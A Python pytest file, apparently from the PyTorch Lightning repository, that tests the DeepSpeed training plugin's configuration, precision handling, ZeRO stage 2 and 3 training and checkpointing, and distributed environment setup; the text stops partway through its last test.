53b7bdbf7f0f031a9b62f8de733c1df144b98a5d | 40,720 | py | Python | tests/plugins/test_deepspeed_plugin.py | aleSuglia/pytorch-lightning | 16213b16356f5bd97b8cc8bf1849eacd68d658c5 | [
"Apache-2.0"
] | 3 | 2021-10-04T05:08:28.000Z | 2021-10-04T06:04:06.000Z | tests/plugins/test_deepspeed_plugin.py | AshleySato899/pytorch-lightning | 854bdc042d12fe4b713de881c58b025de30d0c39 | [
"Apache-2.0"
] | null | null | null | tests/plugins/test_deepspeed_plugin.py | AshleySato899/pytorch-lightning | 854bdc042d12fe4b713de881c58b025de30d0c39 | [
"Apache-2.0"
] | null | null | null | import contextlib
import json
import os
from typing import Any, Dict, Optional
from unittest import mock
import pytest
import torch
import torch.nn.functional as F
from torch import nn, Tensor
from torch.optim import Optimizer
from torch.utils.data import DataLoader
from torchmetrics import Accuracy
from pytorch_lightning import LightningDataModule, LightningModule, seed_everything, Trainer
from pytorch_lightning.callbacks import Callback, LearningRateMonitor, ModelCheckpoint
from pytorch_lightning.plugins import DeepSpeedPlugin, DeepSpeedPrecisionPlugin
from pytorch_lightning.plugins.training_type.deepspeed import LightningDeepSpeedModule
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _DEEPSPEED_AVAILABLE
from tests.helpers.boring_model import BoringModel, RandomDataset, RandomIterableDataset
from tests.helpers.datamodules import ClassifDataModule
from tests.helpers.runif import RunIf
if _DEEPSPEED_AVAILABLE:
import deepspeed
from deepspeed.utils.zero_to_fp32 import convert_zero_checkpoint_to_fp32_state_dict
class ModelParallelBoringModel(BoringModel):
def __init__(self):
super().__init__()
self.layer = None
def configure_sharded_model(self) -> None:
self.layer = torch.nn.Linear(32, 2)
def on_load_checkpoint(self, checkpoint: Dict[str, Any]) -> None:
self.configure_sharded_model()
class ModelParallelBoringModelNoSchedulers(ModelParallelBoringModel):
def configure_optimizers(self):
return torch.optim.SGD(self.layer.parameters(), lr=0.1)
class ModelParallelBoringModelManualOptim(BoringModel):
def __init__(self):
super().__init__()
self.layer = None
def training_step(self, batch, batch_idx):
opt = self.optimizers()
output = self(batch)
loss = self.loss(batch, output)
opt.zero_grad()
self.manual_backward(loss)
opt.step()
def configure_sharded_model(self) -> None:
self.layer = torch.nn.Linear(32, 2)
def on_load_checkpoint(self, checkpoint: Dict[str, Any]) -> None:
self.configure_sharded_model()
@property
def automatic_optimization(self) -> bool:
return False
def test_deepspeed_lightning_module(tmpdir):
"""Test to ensure that a model wrapped in `LightningDeepSpeedModule` moves types and device correctly."""
model = BoringModel()
module = LightningDeepSpeedModule(model, precision=16)
module.half()
assert module.dtype == torch.half
assert model.dtype == torch.half
module.to(torch.double)
assert module.dtype == torch.double
assert model.dtype == torch.double
@RunIf(min_gpus=1)
def test_deepspeed_lightning_module_precision(tmpdir):
"""Test to ensure that a model wrapped in `LightningDeepSpeedModule` moves tensors to half when precision
16."""
model = BoringModel()
module = LightningDeepSpeedModule(model, precision=16)
module.cuda().half()
assert module.dtype == torch.half
assert model.dtype == torch.half
x = torch.randn((1, 32), dtype=torch.float).cuda()
out = module(x)
assert out.dtype == torch.half
module.to(torch.double)
assert module.dtype == torch.double
assert model.dtype == torch.double
@pytest.fixture
def deepspeed_config():
return {
"optimizer": {"type": "SGD", "params": {"lr": 3e-5}},
"scheduler": {
"type": "WarmupLR",
"params": {"last_batch_iteration": -1, "warmup_min_lr": 0, "warmup_max_lr": 3e-5, "warmup_num_steps": 100},
},
}
@pytest.fixture
def deepspeed_zero_config(deepspeed_config):
return {**deepspeed_config, "zero_allow_untested_optimizer": True, "zero_optimization": {"stage": 2}}
@RunIf(deepspeed=True)
@pytest.mark.parametrize("input", ("deepspeed", DeepSpeedPlugin))
def test_deepspeed_plugin_string(tmpdir, input):
"""Test to ensure that the plugin can be passed via string or instance, and parallel devices is correctly
set."""
trainer = Trainer(fast_dev_run=True, default_root_dir=tmpdir, plugins=input if isinstance(input, str) else input())
assert isinstance(trainer.accelerator.training_type_plugin, DeepSpeedPlugin)
assert trainer.accelerator.training_type_plugin.parallel_devices == [torch.device("cpu")]
@RunIf(deepspeed=True)
def test_deepspeed_plugin_env(tmpdir, monkeypatch, deepspeed_config):
"""Test to ensure that the plugin can be passed via a string with an environment variable."""
config_path = os.path.join(tmpdir, "temp.json")
with open(config_path, "w") as f:
f.write(json.dumps(deepspeed_config))
monkeypatch.setenv("PL_DEEPSPEED_CONFIG_PATH", config_path)
trainer = Trainer(fast_dev_run=True, default_root_dir=tmpdir, plugins="deepspeed")
plugin = trainer.accelerator.training_type_plugin
assert isinstance(plugin, DeepSpeedPlugin)
assert plugin.parallel_devices == [torch.device("cpu")]
assert plugin.config == deepspeed_config
@RunIf(deepspeed=True)
@pytest.mark.parametrize("precision", [16, "mixed"])
@pytest.mark.parametrize(
"amp_backend",
["native", pytest.param("apex", marks=RunIf(amp_apex=True))],
)
def test_deepspeed_precision_choice(amp_backend, precision, tmpdir):
"""Test to ensure precision plugin is also correctly chosen.
DeepSpeed handles precision via Custom DeepSpeedPrecisionPlugin
"""
trainer = Trainer(
fast_dev_run=True, default_root_dir=tmpdir, plugins="deepspeed", amp_backend=amp_backend, precision=precision
)
assert isinstance(trainer.accelerator.training_type_plugin, DeepSpeedPlugin)
assert isinstance(trainer.accelerator.precision_plugin, DeepSpeedPrecisionPlugin)
assert trainer.accelerator.precision_plugin.precision == precision
@RunIf(deepspeed=True)
def test_deepspeed_with_invalid_config_path(tmpdir):
"""Test to ensure if we pass an invalid config path we throw an exception."""
with pytest.raises(
MisconfigurationException, match="You passed in a path to a DeepSpeed config but the path does not exist"
):
DeepSpeedPlugin(config="invalid_path.json")
@RunIf(deepspeed=True)
def test_deepspeed_with_env_path(tmpdir, monkeypatch, deepspeed_config):
"""Test to ensure if we pass an env variable, we load the config from the path."""
config_path = os.path.join(tmpdir, "temp.json")
with open(config_path, "w") as f:
f.write(json.dumps(deepspeed_config))
monkeypatch.setenv("PL_DEEPSPEED_CONFIG_PATH", config_path)
plugin = DeepSpeedPlugin()
assert plugin.config == deepspeed_config
@RunIf(deepspeed=True)
def test_deepspeed_defaults(tmpdir):
"""Ensure that defaults are correctly set as a config for DeepSpeed if no arguments are passed."""
plugin = DeepSpeedPlugin()
assert plugin.config is not None
assert isinstance(plugin.config["zero_optimization"], dict)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_warn_deepspeed_override_backward(tmpdir):
"""Test to ensure that if the backward hook in the LightningModule is overridden, we throw a warning."""
class TestModel(BoringModel):
def backward(self, loss: Tensor, optimizer: Optimizer, optimizer_idx: int, *args, **kwargs) -> None:
return loss.backward()
model = TestModel()
trainer = Trainer(fast_dev_run=True, default_root_dir=tmpdir, plugins=DeepSpeedPlugin(), gpus=1, precision=16)
with pytest.warns(UserWarning, match="will be ignored since DeepSpeed handles the backward"):
trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True)
@pytest.mark.parametrize(
["dataset_cls", "value"],
[(RandomDataset, "auto"), (RandomDataset, 10), (RandomIterableDataset, "auto"), (RandomIterableDataset, 10)],
)
@mock.patch("deepspeed.init_distributed", autospec=True)
def test_deepspeed_auto_batch_size_config_select(mock_deepspeed_distributed, tmpdir, dataset_cls, value):
"""Test to ensure that the batch size is correctly set as expected for deepspeed logging purposes."""
class TestModel(BoringModel):
def train_dataloader(self):
return DataLoader(dataset_cls(32, 64))
class AssertCallback(Callback):
def setup(self, trainer, pl_module, stage: Optional[str] = None) -> None:
assert isinstance(trainer.accelerator.training_type_plugin, DeepSpeedPlugin)
config = trainer.accelerator.training_type_plugin.config
# int value overrides auto mode
expected_value = value if isinstance(value, int) else 1
if dataset_cls == RandomDataset:
expected_value = pl_module.train_dataloader().batch_size if value == "auto" else value
assert config["train_micro_batch_size_per_gpu"] == expected_value
raise SystemExit
ck = AssertCallback()
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
fast_dev_run=True,
callbacks=ck,
gpus=1,
plugins=DeepSpeedPlugin(logging_batch_size_per_gpu=value, zero_optimization=False),
)
with pytest.raises(SystemExit):
trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_run_configure_optimizers(tmpdir):
"""Test end to end that deepspeed works with defaults (without ZeRO as that requires compilation), whilst using
configure_optimizers for optimizers and schedulers."""
class TestCB(Callback):
def on_train_start(self, trainer, pl_module) -> None:
from deepspeed.runtime.zero.stage2 import FP16_DeepSpeedZeroOptimizer
assert isinstance(trainer.optimizers[0], FP16_DeepSpeedZeroOptimizer)
assert isinstance(trainer.optimizers[0].optimizer, torch.optim.SGD)
assert isinstance(trainer.lr_schedulers[0]["scheduler"], torch.optim.lr_scheduler.StepLR)
# check that the lr_scheduler config was preserved
assert trainer.lr_schedulers[0]["name"] == "Sean"
class TestModel(BoringModel):
def configure_optimizers(self):
[optimizer], [scheduler] = super().configure_optimizers()
return {"optimizer": optimizer, "lr_scheduler": {"scheduler": scheduler, "name": "Sean"}}
model = TestModel()
lr_monitor = LearningRateMonitor()
trainer = Trainer(
plugins=DeepSpeedPlugin(), # disable ZeRO so our optimizers are not wrapped
default_root_dir=tmpdir,
gpus=1,
fast_dev_run=True,
precision=16,
callbacks=[TestCB(), lr_monitor],
)
trainer.fit(model)
assert lr_monitor.lrs == {"Sean": [0.1]}
_assert_save_model_is_equal(model, tmpdir, trainer)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_config(tmpdir, deepspeed_zero_config):
"""Test to ensure deepspeed works correctly when passed a DeepSpeed config object including
optimizers/schedulers and saves the model weights to load correctly."""
class TestCB(Callback):
def on_train_start(self, trainer, pl_module) -> None:
from deepspeed.runtime.lr_schedules import WarmupLR
from deepspeed.runtime.zero.stage2 import FP16_DeepSpeedZeroOptimizer
assert isinstance(trainer.optimizers[0], FP16_DeepSpeedZeroOptimizer)
assert isinstance(trainer.optimizers[0].optimizer, torch.optim.SGD)
assert isinstance(trainer.lr_schedulers[0]["scheduler"], WarmupLR)
model = BoringModel()
trainer = Trainer(
plugins=[DeepSpeedPlugin(config=deepspeed_zero_config)],
default_root_dir=tmpdir,
gpus=1,
fast_dev_run=True,
precision=16,
callbacks=[TestCB()],
)
trainer.fit(model)
trainer.test(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_custom_precision_params(tmpdir):
"""Ensure if we modify the FP16 parameters via the DeepSpeedPlugin, the deepspeed config contains these
changes."""
class TestCB(Callback):
def on_train_start(self, trainer, pl_module) -> None:
assert trainer.training_type_plugin.config["fp16"]["loss_scale"] == 10
assert trainer.training_type_plugin.config["fp16"]["initial_scale_power"] == 10
assert trainer.training_type_plugin.config["fp16"]["loss_scale_window"] == 10
assert trainer.training_type_plugin.config["fp16"]["hysteresis"] == 10
assert trainer.training_type_plugin.config["fp16"]["min_loss_scale"] == 10
raise SystemExit()
model = BoringModel()
ds = DeepSpeedPlugin(loss_scale=10, initial_scale_power=10, loss_scale_window=10, hysteresis=10, min_loss_scale=10)
trainer = Trainer(default_root_dir=tmpdir, plugins=[ds], precision=16, gpus=1, callbacks=[TestCB()])
with pytest.raises(SystemExit):
trainer.fit(model)
@RunIf(deepspeed=True)
def test_deepspeed_custom_activation_checkpointing_params(tmpdir):
"""Ensure if we modify the activation checkpointing parameters, the deepspeed config contains these changes."""
ds = DeepSpeedPlugin(
partition_activations=True,
cpu_checkpointing=True,
contiguous_memory_optimization=True,
synchronize_checkpoint_boundary=True,
)
checkpoint_config = ds.config["activation_checkpointing"]
assert checkpoint_config["partition_activations"]
assert checkpoint_config["cpu_checkpointing"]
assert checkpoint_config["contiguous_memory_optimization"]
assert checkpoint_config["synchronize_checkpoint_boundary"]
@RunIf(min_gpus=1, deepspeed=True)
def test_deepspeed_assert_config_zero_offload_disabled(tmpdir, deepspeed_zero_config):
"""Ensure if we use a config and turn off offload_optimizer, that this is set to False within the config."""
deepspeed_zero_config["zero_optimization"]["offload_optimizer"] = False
class TestCallback(Callback):
def on_before_accelerator_backend_setup(self, trainer, pl_module) -> None:
assert trainer.training_type_plugin.config["zero_optimization"]["offload_optimizer"] is False
raise SystemExit()
model = BoringModel()
trainer = Trainer(
default_root_dir=tmpdir,
enable_progress_bar=False,
max_epochs=1,
plugins=[DeepSpeedPlugin(config=deepspeed_zero_config)],
precision=16,
gpus=1,
callbacks=[TestCallback()],
)
with pytest.raises(SystemExit):
trainer.fit(model)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu(tmpdir):
"""Test to ensure that DeepSpeed with multiple GPUs works and deepspeed distributed is initialized
correctly."""
model = BoringModel()
trainer = Trainer(
default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=2, fast_dev_run=True, precision=16
)
with mock.patch("deepspeed.init_distributed", wraps=deepspeed.init_distributed) as mock_deepspeed_distributed:
trainer.fit(model)
mock_deepspeed_distributed.assert_called_once()
trainer.test(model)
_assert_save_model_is_equal(model, tmpdir, trainer)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_fp32_works(tmpdir):
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, gpus=1, plugins="deepspeed_stage_3", fast_dev_run=True)
trainer.fit(model)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_stage_3_save_warning(tmpdir):
"""Test to ensure that DeepSpeed Stage 3 gives a warning when saving on rank zero."""
model = BoringModel()
trainer = Trainer(
default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=2, fast_dev_run=True, precision=16
)
trainer.fit(model)
checkpoint_path = os.path.join(tmpdir, "model.pt")
# both ranks need to call save checkpoint, however only rank 0 needs to check the warning
context_manager = (
pytest.warns(UserWarning, match="each worker will save a shard of the checkpoint within a directory.")
if trainer.is_global_zero
else contextlib.suppress()
)
with context_manager:
trainer.save_checkpoint(checkpoint_path)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_multigpu_single_file(tmpdir):
"""Test to ensure that DeepSpeed loads from a single file checkpoint."""
model = BoringModel()
checkpoint_path = os.path.join(tmpdir, "model.pt")
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
trainer.fit(model)
trainer.save_checkpoint(checkpoint_path)
trainer = Trainer(
default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=1, fast_dev_run=True, precision=16
)
plugin = trainer.training_type_plugin
assert isinstance(plugin, DeepSpeedPlugin)
assert not plugin.load_full_weights
with pytest.raises(MisconfigurationException, match="DeepSpeed was unable to load the checkpoint."):
trainer.test(model, ckpt_path=checkpoint_path)
trainer = Trainer(
default_root_dir=tmpdir,
plugins=[DeepSpeedPlugin(stage=3, load_full_weights=True)],
gpus=1,
fast_dev_run=True,
precision=16,
)
plugin = trainer.training_type_plugin
assert isinstance(plugin, DeepSpeedPlugin)
assert plugin.load_full_weights
trainer.test(model, ckpt_path=checkpoint_path)
class ModelParallelClassificationModel(LightningModule):
def __init__(self, lr: float = 0.01, num_blocks: int = 5):
super().__init__()
self.lr = lr
self.num_blocks = num_blocks
self.prepare_data_per_node = True
self.train_acc = Accuracy()
self.valid_acc = Accuracy()
self.test_acc = Accuracy()
def make_block(self):
return nn.Sequential(nn.Linear(32, 32, bias=False), nn.ReLU())
def configure_sharded_model(self) -> None:
self.model = nn.Sequential(*(self.make_block() for x in range(self.num_blocks)), nn.Linear(32, 3))
def forward(self, x):
x = self.model(x)
# Ensure output is in float32 for softmax operation
x = x.float()
logits = F.softmax(x, dim=1)
return logits
def training_step(self, batch, batch_idx):
x, y = batch
logits = self.forward(x)
loss = F.cross_entropy(logits, y)
self.log("train_loss", loss, prog_bar=True)
self.log("train_acc", self.train_acc(logits, y), prog_bar=True, sync_dist=True)
return {"loss": loss}
def validation_step(self, batch, batch_idx):
x, y = batch
logits = self.forward(x)
self.log("val_loss", F.cross_entropy(logits, y), prog_bar=False, sync_dist=True)
self.log("val_acc", self.valid_acc(logits, y), prog_bar=True, sync_dist=True)
def test_step(self, batch, batch_idx):
x, y = batch
logits = self.forward(x)
self.log("test_loss", F.cross_entropy(logits, y), prog_bar=False, sync_dist=True)
self.log("test_acc", self.test_acc(logits, y), prog_bar=True, sync_dist=True)
def predict_step(self, batch, batch_idx, dataloader_idx=None):
x, y = batch
logits = self.forward(x)
self.test_acc(logits, y)
return self.test_acc.compute()
def configure_optimizers(self):
optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)
lr_scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=0.99)
return [optimizer], [{"scheduler": lr_scheduler, "interval": "step"}]
def on_load_checkpoint(self, checkpoint: Dict[str, Any]) -> None:
if not hasattr(self, "model"):
self.configure_sharded_model()
class ManualModelParallelClassificationModel(ModelParallelClassificationModel):
@property
def automatic_optimization(self) -> bool:
return False
def training_step(self, batch, batch_idx):
x, y = batch
logits = self.forward(x)
loss = F.cross_entropy(logits, y)
opt = self.optimizers()
self.log("train_loss", loss, prog_bar=True)
self.log("train_acc", self.train_acc(logits, y), prog_bar=True, sync_dist=True)
opt.zero_grad()
self.manual_backward(loss)
opt.step()
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3(tmpdir, deepspeed_config):
"""Test to ensure ZeRO Stage 3 works with a parallel model."""
model = ModelParallelBoringModel()
trainer = Trainer(
default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=2, fast_dev_run=True, precision=16
)
trainer.fit(model)
trainer.test(model)
_assert_save_model_is_equal(model, tmpdir, trainer)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3_manual_optimization(tmpdir, deepspeed_config):
"""Test to ensure ZeRO Stage 3 works with a parallel model."""
model = ModelParallelBoringModelManualOptim()
model.training_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=2, fast_dev_run=True, precision=16
)
trainer.fit(model)
trainer.test(model)
_assert_save_model_is_equal(model, tmpdir, trainer)
def run_checkpoint_test(tmpdir: str, automatic_optimization: bool = True, accumulate_grad_batches: int = 2):
seed_everything(1)
if automatic_optimization:
model = ModelParallelClassificationModel()
else:
model = ManualModelParallelClassificationModel()
dm = ClassifDataModule()
ck = ModelCheckpoint(monitor="val_acc", mode="max", save_last=True, save_top_k=-1)
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=10,
plugins=[DeepSpeedPlugin(stage=3)],
gpus=2,
precision=16,
accumulate_grad_batches=accumulate_grad_batches,
callbacks=[ck],
)
trainer.fit(model, datamodule=dm)
results = trainer.test(datamodule=dm)
assert results[0]["test_acc"] > 0.7
saved_results = trainer.test(ckpt_path=ck.best_model_path, datamodule=dm)
assert saved_results[0]["test_acc"] > 0.7
assert saved_results == results
if automatic_optimization:
model = ModelParallelClassificationModel()
else:
model = ManualModelParallelClassificationModel()
trainer = Trainer(default_root_dir=tmpdir, gpus=2, plugins=[DeepSpeedPlugin(stage=3)], precision=16)
results = trainer.test(model, datamodule=dm, ckpt_path=ck.best_model_path)
assert results[0]["test_acc"] > 0.7
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3_checkpointing(tmpdir):
"""Test to ensure with Stage 3 and multiple GPUs that we can save/load a model resuming from a checkpoint, and
see convergence."""
run_checkpoint_test(tmpdir)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3_warns_resume_training(tmpdir):
"""Test to ensure with Stage 3 and multiple GPUs that we can resume from training, throwing a warning that the
optimizer state and scheduler states cannot be restored."""
dm = ClassifDataModule()
model = BoringModel()
checkpoint_path = os.path.join(tmpdir, "model.pt")
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
trainer.fit(model)
trainer.save_checkpoint(checkpoint_path)
trainer = Trainer(
default_root_dir=tmpdir,
fast_dev_run=True,
plugins=DeepSpeedPlugin(stage=3, load_full_weights=True),
gpus=1,
precision=16,
resume_from_checkpoint=checkpoint_path,
)
with pytest.warns(
UserWarning,
match="A single checkpoint file has been given. This means optimizer states and "
"scheduler states can not be restored. If you'd like to restore these states, you must "
"provide a path to the originally saved DeepSpeed checkpoint.",
):
trainer.fit(model, datamodule=dm)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3_resume_training(tmpdir):
"""Test to ensure with Stage 3 and multiple GPUs that we can resume training."""
initial_model = ModelParallelClassificationModel()
dm = ClassifDataModule()
ck = ModelCheckpoint(monitor="val_acc", mode="max", save_last=True, save_top_k=-1)
initial_trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_train_batches=2,
limit_val_batches=2,
limit_test_batches=2,
plugins=DeepSpeedPlugin(stage=3),
gpus=1,
precision=16,
callbacks=[ck],
)
initial_trainer.fit(initial_model, datamodule=dm)
class TestCallback(Callback):
def on_train_batch_start(
self, trainer: Trainer, pl_module: LightningModule, batch: Any, batch_idx: int
) -> None:
original_deepspeed_plugin = initial_trainer.accelerator.training_type_plugin
current_deepspeed_plugin = trainer.accelerator.training_type_plugin
assert isinstance(original_deepspeed_plugin, DeepSpeedPlugin)
assert isinstance(current_deepspeed_plugin, DeepSpeedPlugin)
# assert optimizer states are the correctly loaded
original_optimizer_dict = original_deepspeed_plugin.deepspeed_engine.optimizer.state_dict()
current_optimizer_dict = current_deepspeed_plugin.deepspeed_engine.optimizer.state_dict()
for orig_tensor, current_tensor in zip(
original_optimizer_dict["fp32_flat_groups"], current_optimizer_dict["fp32_flat_groups"]
):
assert torch.all(orig_tensor.eq(current_tensor))
# assert model state is loaded correctly
for current_param, initial_param in zip(pl_module.parameters(), initial_model.parameters()):
assert torch.equal(current_param.cpu(), initial_param.cpu())
# assert epoch has correctly been restored
assert trainer.current_epoch == 1
model = ModelParallelClassificationModel()
trainer = Trainer(
default_root_dir=tmpdir,
fast_dev_run=True,
plugins=DeepSpeedPlugin(stage=3),
gpus=1,
precision=16,
resume_from_checkpoint=ck.best_model_path,
callbacks=TestCallback(),
)
trainer.fit(model, datamodule=dm)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3_checkpointing_full_weights_manual(tmpdir):
"""Test to ensure with Stage 3 and multiple GPUs that we can save/load a model resuming from a checkpoint,
where we save the full weights to one file."""
run_checkpoint_test(tmpdir, automatic_optimization=False, accumulate_grad_batches=1)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_2_accumulated_grad_batches(tmpdir):
_deepspeed_multigpu_stage_2_accumulated_grad_batches(tmpdir, offload_optimizer=False)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_2_accumulated_grad_batches_offload_optimizer(tmpdir):
_deepspeed_multigpu_stage_2_accumulated_grad_batches(tmpdir, offload_optimizer=True)
def _deepspeed_multigpu_stage_2_accumulated_grad_batches(tmpdir, offload_optimizer):
"""Test to ensure with Stage 2 and multiple GPUs, accumulated grad batches works."""
seed_everything(42)
class VerificationCallback(Callback):
def __init__(self):
self.on_train_batch_start_called = False
def on_train_batch_start(self, trainer, pl_module: LightningModule, batch: Any, batch_idx: int) -> None:
deepspeed_engine = trainer.training_type_plugin.model
assert trainer.global_step == deepspeed_engine.global_steps
self.on_train_batch_start_called = True
model = ModelParallelClassificationModel()
dm = ClassifDataModule()
verification_callback = VerificationCallback()
trainer = Trainer(
default_root_dir=tmpdir,
enable_progress_bar=False,
# TODO: this test fails with max_epochs >1 as there are leftover batches per epoch.
# there's divergence in how Lightning handles the last batch of the epoch with how DeepSpeed does it.
# we step the optimizers on the last batch but DeepSpeed keeps the accumulation for the next epoch
max_epochs=1,
plugins=[DeepSpeedPlugin(stage=2, offload_optimizer=offload_optimizer)],
gpus=2,
limit_train_batches=5,
limit_val_batches=2,
precision=16,
accumulate_grad_batches=2,
callbacks=[verification_callback],
)
assert trainer.limit_train_batches % trainer.accumulate_grad_batches != 0, "leftover batches should be tested"
trainer.fit(model, datamodule=dm)
assert verification_callback.on_train_batch_start_called
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_test(tmpdir):
"""Test to ensure we can use DeepSpeed with just test using ZeRO Stage 3."""
model = ModelParallelBoringModel()
trainer = Trainer(
default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=2, fast_dev_run=True, precision=16
)
trainer.test(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_multigpu_partial_partition_parameters(tmpdir):
"""Test to ensure that a module that defines a layer inside the ``__init__`` and ``configure_sharded_model``
correctly converts all parameters to float16 when ``precision=16`` and runs successfully."""
class TestModel(ModelParallelBoringModel):
def __init__(self):
super().__init__()
self.layer_2 = torch.nn.Linear(32, 32)
def configure_sharded_model(self) -> None:
self.layer = torch.nn.Linear(32, 2)
def forward(self, x):
x = self.layer_2(x)
return self.layer(x)
def on_train_epoch_start(self) -> None:
assert all([x.dtype == torch.float16 for x in self.parameters()])
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=1, fast_dev_run=True, precision=16
)
trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_multigpu_test_rnn(tmpdir):
"""Test to ensure that turning off explicit partitioning of the entire module for ZeRO Stage 3 works when
training with certain layers which will crash with explicit partitioning."""
class TestModel(BoringModel):
def __init__(self):
super().__init__()
self.rnn = torch.nn.GRU(32, 32)
def on_train_epoch_start(self) -> None:
assert all([x.dtype == torch.float16 for x in self.parameters()])
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
plugins=[DeepSpeedPlugin(stage=3, partition_module=False)],
gpus=1,
fast_dev_run=True,
precision=16,
)
trainer.fit(model)
@RunIf(deepspeed=True)
@mock.patch("deepspeed.init_distributed", autospec=True)
@pytest.mark.parametrize("platform", ["Linux", "Windows"])
def test_deepspeed_plugin_env_variables(mock_deepspeed_distributed, tmpdir, platform):
"""Test to ensure that we setup distributed communication using correctly.
When using windows, ranks environment variables should not be set, and deepspeed should handle this.
"""
trainer = Trainer(default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)])
plugin = trainer.training_type_plugin
assert isinstance(plugin, DeepSpeedPlugin)
with mock.patch("platform.system", return_value=platform) as mock_platform:
plugin._init_deepspeed_distributed()
mock_deepspeed_distributed.assert_called()
mock_platform.assert_called()
if platform == "Windows":
# assert no env variables have been set within the DeepSpeedPlugin
assert all(k not in os.environ for k in ("MASTER_PORT", "MASTER_ADDR", "RANK", "WORLD_SIZE", "LOCAL_RANK"))
else:
assert os.environ["MASTER_ADDR"] == str(trainer.training_type_plugin.cluster_environment.master_address())
assert os.environ["MASTER_PORT"] == str(trainer.training_type_plugin.cluster_environment.master_port())
assert os.environ["RANK"] == str(trainer.training_type_plugin.global_rank)
assert os.environ["WORLD_SIZE"] == str(trainer.training_type_plugin.world_size)
assert os.environ["LOCAL_RANK"] == str(trainer.training_type_plugin.local_rank)
def _assert_save_model_is_equal(model, tmpdir, trainer):
checkpoint_path = os.path.join(tmpdir, "model.pt")
checkpoint_path = trainer.training_type_plugin.broadcast(checkpoint_path)
trainer.save_checkpoint(checkpoint_path)
trainer.training_type_plugin.barrier()
# carry out the check only on rank 0
if trainer.is_global_zero:
single_ckpt_path = os.path.join(tmpdir, "single_model.pt")
convert_zero_checkpoint_to_fp32_state_dict(checkpoint_path, single_ckpt_path)
state_dict = torch.load(single_ckpt_path)
model = model.cpu()
# Assert model parameters are identical after loading
for orig_param, saved_model_param in zip(model.parameters(), state_dict.values()):
if model.dtype == torch.half:
# moved model to float32 for comparison with single fp32 saved weights
saved_model_param = saved_model_param.half()
assert torch.equal(orig_param, saved_model_param)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_no_schedulers(tmpdir):
"""Test to ensure ZeRO Stage 3 works with a parallel model and no schedulers."""
model = ModelParallelBoringModelNoSchedulers()
trainer = Trainer(
default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=2, fast_dev_run=True, precision=16
)
trainer.fit(model)
_assert_save_model_is_equal(model, tmpdir, trainer)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_skip_backward_raises(tmpdir):
class TestModel(BoringModel):
def training_step(self, batch, batch_idx):
return None
model = TestModel()
trainer = Trainer(default_root_dir=tmpdir, plugins=[DeepSpeedPlugin()], gpus=1, fast_dev_run=True, precision=16)
with pytest.raises(MisconfigurationException, match="returning `None` .* is not supported"):
trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_warn_train_dataloader_called(tmpdir):
"""Test DeepSpeed warns when it calls ``lightning_module.train_dataloader`` internally for logging batch
size."""
model = BoringModel()
trainer = Trainer(
default_root_dir=tmpdir,
plugins=[DeepSpeedPlugin()],
gpus=1,
fast_dev_run=True,
)
with pytest.warns(UserWarning, match="Inferring the batch size for internal deepspeed logging"):
trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_setup_train_dataloader(tmpdir):
"""Test DeepSpeed works when setup is required to call, and the user passes the batch size manually."""
class TestSetupIsCalledDataModule(LightningDataModule):
def __init__(self):
super().__init__()
self._setup = False
def setup(self, stage: Optional[str] = None) -> None:
self._setup = True
def train_dataloader(self):
assert self._setup
return DataLoader(RandomDataset(32, 64), batch_size=2)
def val_dataloader(self):
assert self._setup
return DataLoader(RandomDataset(32, 64), batch_size=2)
def test_dataloader(self):
assert self._setup
return DataLoader(RandomDataset(32, 64), batch_size=2)
model = BoringModel()
trainer = Trainer(
